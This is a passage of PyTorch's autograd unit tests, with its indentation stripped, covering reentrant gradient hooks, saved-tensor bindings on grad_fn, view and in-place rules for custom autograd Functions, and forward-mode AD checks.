g = grad.detach().requires_grad_()
new_param = param.detach().requires_grad_()
out = ((g * 2) + new_param).sum()
out.backward()
res = g.grad + grad
param.grad = old_param_grad
return res
handle = param.register_hook(add_gradient_penalty_to_grad)
# Forward pass
tmp = (param * param)
loss = tmp.sum()
# Compute the gradients
loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
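# Same idea but the hook is on a non-leaf tensor: the nested backward gives g.grad == 2, so
# the hook returns 2 + 1 = 3 as the grad flowing into tmp, and param.grad == 3 * 2 * param.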
handle = None
param = torch.rand(10, requires_grad=True)
def manual_increase_gradient(grad):
handle.remove()
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
out = ((g * 2) + 5).sum()
out.backward()
res = g.grad + grad
return res
# Forward pass
tmp = (param * param)
handle = tmp.register_hook(manual_increase_gradient)
loss = tmp.sum()
# Compute the gradients
loss.backward()
self.assertEqual(param.grad, 6 * param)
def test_grad_fn_attr_bindings(self):
# Check that the getter of each type returns what we want
# See `gen_autograd_functions.py` for how the getters are generated
#
# This test is only meant to check if the codegen'd bindings work
# Please help update this test if you update the names of any the fields we check!
#
a = torch.ones(1, requires_grad=True)
b = torch.ones(1, requires_grad=True)
out = torch.stack([a, b], dim=0)
self.assertEqual(out.grad_fn._saved_tensors, (a, b)) # TensorList -> Tuple[Tensor]
self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_tensors[0], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_dim, 0) # int64_t -> int
self.assertIsInstance(out.grad_fn._saved_dim, int)
out.grad_fn._raw_saved_tensors[0].register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._raw_saved_tensors
self.assertEqual(out.grad_fn._saved_dim, 0)
a = torch.ones(2, 2, requires_grad=True)
indices = torch.tensor([0, 1])
out = a[:, indices]
self.assertEqual(out.grad_fn._saved_indices, (None, indices)) # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_indices[1], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_self_sizes, a.shape) # IntArrayRef -> Tuple[int]
self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)
out.grad_fn._raw_saved_indices[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
out.grad_fn._raw_saved_indices[0].register_hooks(lambda x: x, lambda x: x)
a = torch.ones(2, 2, requires_grad=True)
out = a * a
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after it has been freed"):
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.nn.functional.interpolate(a, 4, mode="linear")
self.assertEqual(out.grad_fn._saved_output_size, (4,)) # c10::optional<IntArrayRef> -> int[]?
self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
self.assertEqual(out.grad_fn._saved_align_corners, False) # bool -> bool
self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
self.assertIsNone(out.grad_fn._saved_scale_factors) # c10::optional<ArrayRef<double>> -> float[]?
out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
self.assertIsNone(out.grad_fn._saved_output_size)
self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)
a = torch.ones(2, 2, requires_grad=True)
out = torch.pdist(a, p=1)
self.assertEqual(out.grad_fn._saved_p, 1.) # double -> float
self.assertIsInstance(out.grad_fn._saved_p, float)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.logit(a, 1.)
self.assertEqual(out.grad_fn._saved_eps, 1.) # c10:optional<double> -> float?
self.assertIsInstance(out.grad_fn._saved_eps, float)
out = torch.logit(a)
self.assertIsNone(out.grad_fn._saved_eps)
if torch._C.has_lapack:
a = torch.ones(1, 1, requires_grad=True)
q, r = torch.linalg.qr(a, mode="reduced")
self.assertEqual(q.grad_fn._saved_mode, "reduced") # std::string -> str
a = torch.tensor([1.], requires_grad=True)
out = torch.div(a, 2., rounding_mode="trunc")
self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc") # c10::optional<std::string> -> str?
out = torch.div(a, 2., rounding_mode=None)
self.assertIsNone(out.grad_fn._saved_rounding_mode) # c10::optional<std::string> -> str?
x = torch.zeros(5, requires_grad=True)
out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex double) -> complex
cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex float) -> complex
out = torch.threshold(x, threshold=1., value=1.)
self.assertIsInstance(out.grad_fn._saved_threshold, float) # Scalar(floating point) -> float
out = torch.threshold(x, threshold=1, value=1)
self.assertIsInstance(out.grad_fn._saved_threshold, int) # Scalar(integral) -> int
out = torch.threshold(x, threshold=False, value=False)
self.assertIsInstance(out.grad_fn._saved_threshold, bool) # Scalar(bool) -> bool
a = torch.ones(2, 2, requires_grad=True)
out = a.as_strided((3,), (1,), 1)
self.assertEqual(out.grad_fn._saved_storage_offset, 1) # c10:optional<int64_t> -> int?
self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
out = a.as_strided((3,), (1,))
self.assertIsNone(out.grad_fn._saved_storage_offset)
a = torch.ones(2, requires_grad=True)
out = torch.tanh(a)
self.assertEqual(out, out.grad_fn._saved_result) # saved variable when output
a = torch.randn(3, 5, requires_grad=True)
b = torch.tensor([1, 0, 4])
loss = nn.NLLLoss()
out = loss(a, b)
self.assertIsNone(out.grad_fn._saved_weight)
loss = nn.NLLLoss(weight=torch.ones((5,)))
out = loss(a, b)
self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,))) # c10:optional<Tensor> -> Tensor?
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_weight
def test_cant_create_saved_tensors(self):
with self.assertRaisesRegex(RuntimeError, "Trying to create a SavedTensor object from Python is forbidden"):
torch.autograd.SavedTensor()
def test_custom_function_saved_tensors(self):
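# Exercises grad_fn.saved_tensors / _raw_saved_tensors for a custom Function: saving None,
# registering pack/unpack hooks, and erroring on access after the graph has been freed.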
def getFn(save=True):
class MyFn(Function):
@staticmethod
def forward(ctx, x):
if save:
ctx.save_for_backward(x, None)
return x
@staticmethod
def backward(ctx, g):
return g
return MyFn
a = torch.randn(5, requires_grad=True)
y = getFn(True).apply(a)
self.assertEqual((a, None), y.grad_fn.saved_tensors)
saved = y.grad_fn._raw_saved_tensors
self.assertIsInstance(saved[0], torch._C._autograd.SavedTensor)
# We can't tell the underlying tensor is None without unpacking it
self.assertIsInstance(saved[1], torch._C._autograd.SavedTensor)
# We catch that error when the user calls register_hooks on it
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
saved[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(1, 1)
saved[0].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "already been set"):
saved[0].register_hooks(lambda x: x, lambda x: x)
y.sum().backward()
# Using a reference to the SavedTensor object after the
# saved variables have been released can lead to undefined behavior
del saved
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn._raw_saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn.saved_tensors
y = getFn(False).apply(a)
self.assertEqual(y.grad_fn.saved_tensors, ())
self.assertEqual(y.grad_fn._raw_saved_tensors, ())
def test_autograd_views_codegen(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change to these tests will be BC-breaking and should be done carefully.
# This test checks the behavior of two codegen functions (view_as and unbind)
# with respect to view tracking and inplace operation on the output.
def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
def maybe_check_raise(fn, should_raise):
self.assertTrue(should_raise is None or isinstance(should_raise, str))
if should_raise is not None:
with self.assertRaisesRegex(RuntimeError, should_raise):
fn()
else:
fn()
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.view_as(inp)
# Are they differentiable views?
self.assertTrue(out._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.unbind()
# Are they differentiable views?
self.assertTrue(out[0]._is_view() == is_view)
self.assertTrue(out[1]._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])
# should_raise contains None if it should not raise
# should_raise contains a string of the error if it should raise
# The 3 elements are for view_as, first output of unbind and second output of unbind
run_test(grad_mode=True, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
inp_change_err = "Output {} of UnbindBackward0 is a view and is being modified inplace."
run_test(grad_mode=True, requires_grad=True, is_view=True,
should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
run_test(grad_mode=False, requires_grad=True, is_view=True,
should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
run_test(grad_mode=False, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
def test_inplace_not_requires_grad(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp):
return inp.view_as(inp)
@staticmethod
def backward(ctx, grad):
return grad
# Original Tensor does not require grad
a = torch.rand(1, 2)
# Tensor being written does require grad
b = torch.rand(1, requires_grad=True)
# Take an invalid view on 'a' that should raise an error (warns during deprecation)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a += b
# Extra test for copy_ that is a manual implementation and could be easily
# forgotten when the codegen is updated (warns during deprecation)
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a.copy_(b)
# Functions that should throw must properly throw
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = a.unbind()[0]
with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
"multiple views."):
view_a.copy_(b)
# Sanity check that views that should work still work
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
a.select(1, 0).copy_(b)
def _do_test_autograd_simple_views_python(self, dtype):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change to these tests will be BC-breaking and should be done carefully.
# This checks the autograd.Function behavior when we return one or multiple outputs
# while one of these is an input, a view of an input or of a temporary tensor.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
# This indicator is used to check if the argument `ga` contains non-zero values
ga_nz = [False]
class IdOneOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a
@staticmethod
def backward(ctx, ga):
bw_called[0] += 1
return ga, None, None
class IdTwoOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
if ga.eq(0).all():
ga_nz[0] = False
else:
ga_nz[0] = True
return ga + gab, gab, None
class ViewOfTemp(Function):
@staticmethod
def forward(ctx, a, make_view):
ctx.save_for_backward(a)
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
b = a.clone()
return b.select(0, 0)
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, 0).copy_(grad)
return res, None
fn_id_to_inplace_on_view_err_msg = {
"one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
"modified inplace. This view was created inside a custom Function"),
"two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
" This view is the output of a function that returns multiple views."),
"view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
"modified inplace. This view was created inside a custom Function")
}
for fn_id in ["one_output", "two_output", "view_of_temp"]:
for inplace in [True, False]:
for make_view in [True, False]:
# Used for special casing the tests below
output_is_a_view = (make_view or fn_id == "view_of_temp")
def fn(a, b):
# never modify a, b in-place for gradcheck
a = a.clone()
b = b.clone()
if fn_id == "two_output":
tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
if inplace:
tmp1 += 3
tmp2 += 3
else:
tmp1 = tmp1 + 3
tmp2 = tmp2 + 3
tmp = tmp1 * tmp2
else:
if fn_id == "one_output":
tmp = IdOneOutput.apply(a, b, make_view)
else:
tmp = ViewOfTemp.apply(a + b, make_view)
if inplace:
tmp += 3
else:
tmp = tmp + 3
return tmp.sum()
a = torch.ones(2, dtype=dtype, requires_grad=True)
b = torch.ones(2, dtype=dtype, requires_grad=True)
err_msg = fn_id_to_inplace_on_view_err_msg[fn_id]
if not inplace or not output_is_a_view:
gradcheck(fn, (a, b), check_batched_grad=False)
# Was the custom backward called properly
bw_called[0] = 0
ga_nz[0] = True # For the case where the backward is called
if inplace and output_is_a_view:
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(a, b)
else:
fn(a, b).backward()
expected_called = 1
expected_ga_nz = True
if output_is_a_view and inplace:
expected_called = 0
self.assertTrue(bw_called[0] == expected_called)
self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
self._do_test_autograd_simple_views_python(torch.double)
self._do_test_autograd_simple_views_python(torch.cdouble)
def test_autograd_inplace_views_creation_meta(self):
# Tests creation_meta properly handled for inplace views
class Func(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.view_as(x)
@staticmethod
def backward(ctx, x):
return x
view_custom = Func.apply
def run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2):
# This test checks the behavior of inplace-view functions when
# the views are created in grad mode or not
base = torch.rand(2, 3, requires_grad=requires_grad).clone()
# 1. Create a view with `grad_mode=grad_mode_view`
with torch.set_grad_enabled(grad_mode_view):
if fn_type == "multi_view":
inp = base.unbind()[0]
elif fn_type == "custom" :
inp = view_custom(base)
else:
inp = base.view_as(base)
# 2. Perform inplace view with `grad_mode=grad_mode_iview`
with torch.set_grad_enabled(grad_mode_iview):
if error1 is not None:
with self.assertRaisesRegex(RuntimeError, error1):
fn(inp)
return
else:
# If error is None, check that runs without error
fn(inp)
# 3. Do inplace on the (new) view
if error2 is not None:
with self.assertRaisesRegex(RuntimeError, error2):
inp.add_(1)
else:
# If error is None, check that runs without error
inp.add_(1)
no_grad_err = "A view was created in no_grad mode"
multi_view_err = "function that returns multiple views"
custom_err = "view was created inside a custom Function"
def run_tests(fn):
for fn_type in ("normal", "multi_view", "custom"):
for grad_mode_view in (True, False):
for grad_mode_iview in (True, False):
for requires_grad in (True, False):
error1 = None # expected error when we do inplace_view on original view
error2 = None # expected error when we do inplace on the resulting view
if requires_grad:
if not grad_mode_view and grad_mode_iview:
error1 = no_grad_err
if not grad_mode_view and not grad_mode_iview:
error2 = no_grad_err
if fn_type == "multi_view":
if grad_mode_view and grad_mode_iview:
error1 = multi_view_err
if grad_mode_view and not grad_mode_iview:
error2 = multi_view_err
if fn_type == "custom":
if grad_mode_view and grad_mode_iview:
error1 = custom_err
if grad_mode_view and not grad_mode_iview:
error2 = custom_err
run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2)
# This list was created by logging gen_inplace_or_view_type.py
# detach_ is excluded for this test because it cannot be applied to
# views and thus does not return a view
run_tests(lambda v: v.as_strided_((1, 0), (2, 2)))
run_tests(lambda v: v.transpose_(0, 0))
run_tests(lambda v: v.t_())
run_tests(lambda v: v.squeeze_(0))
run_tests(lambda v: v.unsqueeze_(0))
run_tests(lambda v: v.swapdims_(0, 0))
run_tests(lambda v: v.swapaxes_(0, 0))
# TODO This is not the correct behavior -
# See https://github.com/pytorch/pytorch/issues/49825#issuecomment-794466627
def test_autograd_inplace_views_cross_dtype(self):
# This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b = b.transpose(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
non_inplace_grad = a_orig.grad
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b.transpose_(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
inplace_grad = a_orig.grad
# TODO: this is a bug!
# once this is fixed, it should have the transpose removed:
# self.assertEqual(non_inplace_grad, inplace_grad)
self.assertEqual(non_inplace_grad.T, inplace_grad)
def test_autograd_multiple_views_python(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change to these tests will be BC-breaking and should be done carefully.
# This checks that multiple views in the forward are properly traced and how they
# behave with respect to inplace operations.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
class ComplexView(Function):
@staticmethod
def forward(ctx, a, idx):
res = a.narrow(0, idx, 1)
res = a.select(0, idx)
ctx.save_for_backward(a)
ctx.idx = idx
return res
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, ctx.idx).copy_(grad)
return res, None
a = torch.ones(2, requires_grad=True)
idx = 1
bw_called[0] = 0
out = ComplexView.apply(a.clone(), idx)
out.sum().backward()
self.assertTrue(bw_called[0] == 1)
out = ComplexView.apply(a.clone(), idx)
with self.assertRaisesRegex(RuntimeError,
"Output 0 of ComplexViewBackward is a view and is being modified inplace"):
out += 1
def test_autograd_python_custom_function_inplace(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change to these tests will be BC-breaking and should be done carefully.
# This test checks custom autograd.Function that perform inplace operations
bw_called = [0]
# I) Single output
class MyAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
# No extra inplace
c = MyAdder.apply(a.clone(), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c = MyAdder.apply(a.clone(), b)
c += 2
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
bw_called[0] = 0
c = MyAdder.apply(a.clone().view_as(a), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# Should not give non-inputs to mark_dirty
class MyAdderBad(Function):
@staticmethod
def forward(ctx, a, b):
c = 3 * a
c.add_(b)
ctx.mark_dirty(c)
return c
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
grad = 3 * grad
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
MyAdderBad.apply(a.clone(), b)
self.assertEqual(len(w), 1)
# II) Multiple outputs
class MyBadAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + gab
# No extra inplace
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
c += 2
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
c, d = MyBadAdder.apply(a.clone().view_as(a), b)
# III) Inplace + other op
class MyOutPlaceAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a.clone(), a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + 2 * gab
# We don't reuse the input
def fn(a, b):
orig_a = a.clone().view_as(a)
c, d = MyOutPlaceAdder.apply(orig_a, b)
return (c * d).sum()
bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
fn(a, b)
def test_named_tensor_for_complex_views(self):
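# Names are stripped with rename(None) before view_as_complex / view_as_real and re-applied
# with refine_names (named-tensor support for these views appears limited); backward should
# still produce the expected grad for z.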
names = ["batch", "height", "width", "complex"]
z = torch.ones((5, 12, 14, 2), requires_grad=True)
z_named = z.refine_names(*names)
z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1])
z_complex.sum().backward()
self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None)))
def test_custom_function_return_view_in_nograd(self):
class Alias(Function):
@staticmethod
def forward(ctx, x):
return x[:]
@staticmethod
def backward(ctx, gx):
return gx
inp = torch.rand(2, requires_grad=True)
with torch.no_grad():
output = Alias.apply(inp)
with torch.no_grad():
expected_output = inp[:]
# Calling the custom function should operate as if we called an equivalent op
self.assertEqual(output.requires_grad, expected_output.requires_grad)
# Check that in-place modification on view throws
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
output.zero_()
def test_grad_mode_restored_reentrant(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, go):
original = torch._C.is_grad_enabled()
with torch.enable_grad():
self.assertTrue(torch._C.is_grad_enabled())
foo = torch.rand(go.size(), requires_grad=True)
grad, = torch.autograd.grad(
foo ** 3, foo, grad_outputs=go
)
self.assertTrue(torch._C.is_grad_enabled())
self.assertTrue(torch._C.is_grad_enabled() == original)
return grad
inp = torch.rand(3, requires_grad=True)
# Case where original==False
MyFunction.apply(inp).sum().backward()
# Case where original==True
MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
a = torch.tensor([0., 0., 0.])
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(a**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
s = 0
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(s**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
def test_custom_function_error(self):
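# Each Function below omits (or duplicates) a required method; apply(), backward() or
# forward-mode use should fail with an error naming the missing forward/backward/vjp/jvp.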
class BadFw(Function):
@staticmethod
def backward(ctx, foo):
return foo
class BadBw(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
class BadBw2(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
@staticmethod
def backward(ctx, foo):
return foo
@staticmethod
def vjp(ctx, foo):
return foo
class BadJvp(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
inp = torch.rand(1, requires_grad=True)
with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
BadFw.apply(inp)
with self.assertRaisesRegex(RuntimeError, "must implement either the backward"):
BadBw.apply(inp).sum().backward()
with self.assertRaisesRegex(RuntimeError, "Implementing both 'backward' and 'vjp'"):
BadBw2.apply(inp).sum().backward()
with self.assertRaisesRegex(RuntimeError, "must implement the jvp function"):
with fwAD.dual_level():
d = fwAD.make_dual(inp, torch.rand_like(inp))
res = BadJvp.apply(d)
def test_custom_function_forward_mode_view_checks(self):
flag_to_error = {
"ok": None,
"not_a_view": "jvp is not returning a view",
"not_a_view_of_inp": "jvp is not returning a view of the given",
"not_a_view_of_inp_base": "jvp is not returning a view of the same base",
}
class ViewFn(Function):
@staticmethod
def forward(ctx, foo, flag):
ctx.flag = flag
ctx.size = foo.size()
return foo.narrow(0, 0, 2)
@staticmethod
def vjp(ctx, gO):
gI = gO.new_zeros(ctx.size)
gI.narrow(0, 0, 2).copy_(gO)
return gI, None
@staticmethod
def jvp(ctx, gI, _):
res = gI.narrow(0, 0, 2)
if ctx.flag != "ok":
# Break the view in the gradients!
res = res.clone()
if ctx.flag in ["not_a_view_of_inp", "not_a_view_of_inp_base"]:
# Result should be a view, just of the wrong thing
res = res.view_as(res)
return res
inp = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
for flag, msg in flag_to_error.items():
def test_fn(inp):
if flag == "not_a_view_of_inp_base":
inp = inp.view_as(inp)
return ViewFn.apply(inp, flag)
if msg is None:
gradcheck(test_fn, inp, check_forward_ad=True)
else:
with self.assertRaisesRegex(RuntimeError, msg):
gradcheck(test_fn, inp, check_forward_ad=True)
def test_custom_function_forward_mode_inplace_checks(self):
class InplaceFn(Function):
@staticmethod
def forward(ctx, foo, flag):
ctx.mark_dirty(foo)
ctx.flag = flag
foo.mul_(2)
return foo
@staticmethod
def vjp(ctx, gO):
return 2 * gO, None
@staticmethod
def jvp(ctx, gI, _):
if ctx.flag:
# Don't do the change inplace
return 2 * gI
else:
gI.mul_(2)
return gI
inp = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
def test_fn(inp, flag):
inp = inp.clone()
return InplaceFn.apply(inp, flag)
gradcheck(test_fn, (inp, False), check_forward_ad=True)
with self.assertRaisesRegex(RuntimeError, "inplace custom Function is not modifying the forward mode gradients inplace"):
gradcheck(test_fn, (inp, True), check_forward_ad=True)
def test_custom_function_forward_mode_wrong_formula(self):
class UserFn(Function):
@staticmethod
def forward(ctx, foo, should_fail):
ctx.should_fail = should_fail
return foo * 2
@staticmethod
def vjp(ctx, gO):
return 2 * gO, None
@staticmethod
def jvp(ctx, gI, _):
if ctx.should_fail:
# Wrong gradient formula
return 3 * gI
else:
return 2 * gI
inp = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(UserFn.apply, (inp, False), check_forward_ad=True)
with self.assertRaisesRegex(RuntimeError, "Jacobian computed with forward mode mismatch for output 0"):
gradcheck(UserFn.apply, (inp, True), check_forward_ad=True)
def test_custom_function_forward_mode_non_tensor_before_tensor_args(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, nt, x, nt2, y):
return x * 2 + y * 3
@staticmethod
def jvp(ctx, nt, x_t, nt2, y_t):
self.assertIsNone(nt)
self.assertIsNone(nt2)
return x_t * 2 + y_t * 3
x = torch.tensor(1., dtype=torch.double)
t = torch.tensor(1., dtype=torch.double)
y = torch.tensor(1., dtype=torch.double)
with fwAD.dual_level():
dual_x = fwAD.make_dual(x, t)
MyFn.apply(1, dual_x, 1, y)
gradcheck(MyFn.apply, (1, x.requires_grad_(True), 1, y.requires_grad_(True)), check_forward_ad=True,
check_backward_ad=False, check_batched_grad=False)
def test_custom_function_forward_mode_forward_is_no_op(self):
error_regex = "A custom Function's forward is returning a view \\(or an input as-is\\)"
return_lambdas = {
# If we return an input as-is in forward, that is treated
# as if self.view_as(self) is performed. If jvp returns x.view_as(x),
# this is OK.
"view_as": lambda x: x.view_as(x),
# Expect this to raise an error
"self": lambda x: x,
# Expect this to raise the same error
"mul_by_2": lambda x: x * 2,
}
for k, fn in return_lambdas.items():
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y):
return x + y, x
@staticmethod
def vjp(ctx, gO1, gO2):
return gO1 + gO2, gO1
@staticmethod
def jvp(ctx, x_t, y_t):
return x_t + y_t, fn(x_t)
a = torch.tensor(1., dtype=torch.double, requires_grad=True)
t = torch.tensor(1., dtype=torch.double)
b = torch.tensor(1., dtype=torch.double, requires_grad=True)
c = torch.tensor(1., dtype=torch.double)
t2 = torch.tensor(1., dtype=torch.double)
d = torch.tensor(1., dtype=torch.double)
with fwAD.dual_level():
a_dual = fwAD.make_dual(a, t)
c_dual = fwAD.make_dual(c, t2)
if k == "view_as":
_, out2 = MyFn.apply(a_dual, b)
self.assertTrue(fwAD.unpack_dual(out2).tangent._base is t)
_, out2 = MyFn.apply(c_dual, d)
self.assertTrue(fwAD.unpack_dual(out2).tangent._base is t2)
else:
with self.assertRaisesRegex(RuntimeError, error_regex):
MyFn.apply(a_dual, b)
with self.assertRaisesRegex(RuntimeError, error_regex):
MyFn.apply(c_dual, d)
if k == "view_as":
gradcheck(MyFn.apply, (a, c), check_forward_ad=True)
else:
with self.assertRaisesRegex(RuntimeError, error_regex):
gradcheck(MyFn.apply, (a, c), check_forward_ad=True)
def test_custom_function_save_for_forward(self):
class Func(torch.autograd.Function):
@staticmethod
def forward(ctx, x: torch.Tensor, y: torch.Tensor, z: int):
ctx.save_for_backward(x, y)
ctx.save_for_forward(x, y)
ctx.z = z
ctx.prod = x * y
return z * ctx.prod
@staticmethod
def jvp(ctx, x_t, y_t, _):
x_p, y_p = ctx.saved_tensors
z = ctx.z
